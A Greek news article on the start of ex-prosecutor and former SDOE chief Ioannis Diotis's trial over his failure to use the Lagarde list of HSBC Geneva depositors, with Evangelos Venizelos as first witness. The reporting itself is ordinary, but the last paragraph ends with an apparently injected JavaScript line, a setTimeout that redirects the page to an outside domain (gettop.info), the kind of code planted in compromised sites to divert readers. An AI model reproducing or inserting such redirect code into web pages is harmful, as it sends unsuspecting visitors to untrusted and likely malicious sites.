Στο εδώλιο ο Διώτης για τη λίστα Λαγκάρντ

0
4

 

Σήμερα αναμένεται να αρχίσει στο Τριμελές Εφετείο Κακουργημάτων η δίκη του πρώην εισαγγελέα και πρώην επικεφαλής του Σώματος Δίωξης Οικονομικού Εγκλήματος (ΣΔΟΕ), Ιωάννη Διώτη για τους χειρισμούς που έγιναν στην υπόθεση της λίστας Λαγκάρντ.

Αυτή θεωρείται η δεύτερη μεγάλη δίκη για το ίδιο θέμα μετά αυτή του πρώην υπουργού Οικονομικών Γιώργο Παπακωσταντίνου στο Ειδικό Δικαστήριο.

Η κατηγορία που έχει αποδοθεί στον κ. Διώτη είναι σε βαθμό κακουργήματος και αφορά στο αδίκημα της απιστίας στην υπηρεσία. Σύμφωνα με το βούλευμα ο Ιωάννης Διώτης δεν αξιοποίησε τη λίστα Λαγκάρντ, στην οποία περιλαμβάνονταν 2.062 ονομάτων Ελλήνων καταθετών στο υποκατάστημα της τράπεζας HSBC στη Γενεύη, προκειμένου να αντλήσει στοιχεία και να προχωρήσει σε φορολογικούς ελέγχους.

Ο ίδιος ο πρώην εισαγγελέας είχε σημειώσεις πως δεν μπορούσε να αξιοποιήσει την επίμαχη λίστα καθώς όπως έχει υποστηρίξει αποτελούσε παράνομο υλικό και δεν μπορούσε να αξιοποιηθεί, επιχείρημα που όμως απέρριψαν με το βούλευμά τους τα μέλη του δικαστικού συμβουλίου.

Εντός της δικαστικής αιθούσης θα βρεθεί για να καταθέσει ως πρώτος μάρτυρας ο πρώην πρόεδρος του ΠΑΣΟΚ και πρώην υπουργός Οικονομικών, Ευάγγελος Βενιζέλος, ο οποίος ήταν ο πολιτικός προϊστάμενος του κ. Διώτη την επίμαχη περίοδο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here